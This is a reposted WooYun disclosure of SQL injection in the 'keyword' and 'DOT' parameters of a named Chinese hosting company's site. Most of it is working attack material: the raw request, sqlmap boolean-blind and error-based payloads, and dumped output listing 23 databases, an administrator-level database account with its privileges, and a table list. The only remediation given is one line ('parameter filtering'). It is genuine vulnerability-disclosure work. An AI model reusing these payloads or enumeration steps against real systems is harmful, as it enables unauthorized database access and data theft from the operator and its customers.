时代互联某站SQL注入两处参数

admin
admin
admin
142269
文章
117
评论
2017年3月17日11:53:43评论224 views字数 214阅读0分42秒阅读模式
摘要

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-15: 厂商已经确认,细节仅向厂商公开
2016-03-25: 细节向核心白帽子及相关领域专家公开
2016-04-04: 细节向普通白帽子公开
2016-04-14: 细节向实习白帽子公开
2016-04-29: 细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-184948

漏洞标题: 时代互联某站SQL注入两处参数

相关厂商: 广东时代互联科技有限公司

漏洞作者: 路人甲

提交时间: 2016-03-15 15:43

公开时间: 2016-04-29 16:19

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射

0人收藏

漏洞详情

披露状态:

2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-15: 厂商已经确认,细节仅向厂商公开
2016-03-25: 细节向核心白帽子及相关领域专家公开
2016-04-04: 细节向普通白帽子公开
2016-04-14: 细节向实习白帽子公开
2016-04-29: 细节向公众公开

简要描述:

详细说明:

code 区域 
GET /?keyword=11'&Type=&DOT= HTTP/1.1
 Host: youyi.e.now.cn
 Proxy-Connection: keep-alive
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Referer: http://youyi.e.now.cn/?keyword=&Type=11&DOT=
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: Hm_lvt_ddaf8c4c0fd64175d7c169fbef9c7b43=1458023855; Hm_lpvt_ddaf8c4c0fd64175d7c169fbef9c7b43=1458023869; PHPSESSID=p20cgkhjfpuqdi0cc50c2fphhp23t5v8
code 区域 
keyword 和DOT都存在注入

时代互联某站SQL注入两处参数

时代互联某站SQL注入两处参数

时代互联某站SQL注入两处参数

时代互联某站SQL注入两处参数

时代互联某站SQL注入两处参数

时代互联某站SQL注入两处参数

漏洞证明:

code 区域 
sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: keyword (GET)
     Type: boolean-based blind
     Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
     Payload: keyword=-2892' OR MAKE_SET(8743=8743,1318) AND 'HBXB' LIKE 'HBXB&Type=&DOT=
 
     Type: error-based
     Title: MySQL OR error-based - WHERE or HAVING clause
     Payload: keyword=-9480' OR 1 GROUP BY CONCAT(0x71766a6a71,(SELECT (CASE WHEN (7168=7168) THEN 1 ELSE 0 END)),0x71706a7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Type=&DOT=
 ---
 web application technology: PHP 5.4.28, Apache 2.2.27
 back-end DBMS: MySQL >= 5.0.0
 current database:    'DomainMarket'
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: keyword (GET)
     Type: boolean-based blind
     Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
     Payload: keyword=-2892' OR MAKE_SET(8743=8743,1318) AND 'HBXB' LIKE 'HBXB&Type=&DOT=
 
     Type: error-based
     Title: MySQL OR error-based - WHERE or HAVING clause
     Payload: keyword=-9480' OR 1 GROUP BY CONCAT(0x71766a6a71,(SELECT (CASE WHEN (7168=7168) THEN 1 ELSE 0 END)),0x71706a7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Type=&DOT=
 ---
 web application technology: PHP 5.4.28, Apache 2.2.27
 back-end DBMS: MySQL >= 5.0.0
 available databases [23]:
 [*] _ICP_QY
 [*] db_now_net_cn
 [*] db_now_net_cn_bak
 [*] DOCCenter
 [*] DOCCenter_new
 [*] DomainEx
 [*] DomainMarket
 [*] Global
 [*] ICP
 [*] ICPQY
 [*] ICPQYOLD
 [*] information_schema
 [*] IPArea
 [*] Mobile
 [*] mysql
 [*] now_net_cn_bbs
 [*] now_net_cn_expired
 [*] now_net_cn_frozen
 [*] now_net_cn_log
 [*] proftpd
 [*] staff_now_net_cn
 [*] todaymail
 [*] Tomcat
 
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: keyword (GET)
     Type: boolean-based blind
     Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
     Payload: keyword=-2892' OR MAKE_SET(8743=8743,1318) AND 'HBXB' LIKE 'HBXB&Type=&DOT=
 
     Type: error-based
     Title: MySQL OR error-based - WHERE or HAVING clause
     Payload: keyword=-9480' OR 1 GROUP BY CONCAT(0x71766a6a71,(SELECT (CASE WHEN (7168=7168) THEN 1 ELSE 0 END)),0x71706a7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Type=&DOT=
 ---
 web application technology: PHP 5.4.28, Apache 2.2.27
 back-end DBMS: MySQL >= 5.0.0
 database management system users privileges:
 [*] 'scp'@'10.0.183.215' (administrator) [23]:
     privilege: ALTER
     privilege: CREATE
     privilege: CREATE ROUTINE
     privilege: CREATE TEMPORARY TABLES
     privilege: CREATE VIEW
     privilege: DELETE
     privilege: DROP
     privilege: EXECUTE
     privilege: FILE
     privilege: INDEX
     privilege: INSERT
     privilege: LOCK TABLES
     privilege: PROCESS
     privilege: REFERENCES
     privilege: RELOAD
     privilege: REPLICATION CLIENT
     privilege: REPLICATION SLAVE
     privilege: SELECT
     privilege: SHOW DATABASES
     privilege: SHOW VIEW
     privilege: SHUTDOWN
     privilege: SUPER
     privilege: UPDATE
 
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: keyword (GET)
     Type: boolean-based blind
     Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
     Payload: keyword=-2892' OR MAKE_SET(8743=8743,1318) AND 'HBXB' LIKE 'HBXB&Type=&DOT=
 
     Type: error-based
     Title: MySQL OR error-based - WHERE or HAVING clause
     Payload: keyword=-9480' OR 1 GROUP BY CONCAT(0x71766a6a71,(SELECT (CASE WHEN (7168=7168) THEN 1 ELSE 0 END)),0x71706a7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Type=&DOT=
 ---
 web application technology: PHP 5.4.28, Apache 2.2.27
 back-end DBMS: MySQL >= 5.0.0
 Database: DomainMarket
 [33 tables]
 +--------------------+
 | ADManage           |
 | BackOrder          |
 | DnbizDomain        |
 | DomainAttention    |
 | DomainAuctions     |
 | DomainAuctions1225 |
 | DomainBid          |
 | DomainBid1225      |
 | DomainBrokergae    |
 | DomainCategory     |
 | DomainDeleting     |
 | DomainDeleting_biz |
 | DomainDeleting_cc  |
 | DomainDeleting_cn  |
 | DomainDeleting_com |
 | DomainDeleting_hk  |
 | DomainDeleting_net |
 | DomainDeleting_org |
 | DomainDeleting_top |
 | DomainEvaluate     |
 | DomainFOA          |
 | DomainGood         |
 | DomainInvest       |
 | DomainProxy        |
 | DomainShop         |
 | ENews              |
 | ExchangeLog        |
 | FastRank           |
 | RecommendAuctions  |
 | UpSecurity         |
 | domain_resell_log  |
 | domainpark         |
 | domainrevenue      |
 +--------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-03-15 16:19

厂商回复:

谢谢

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin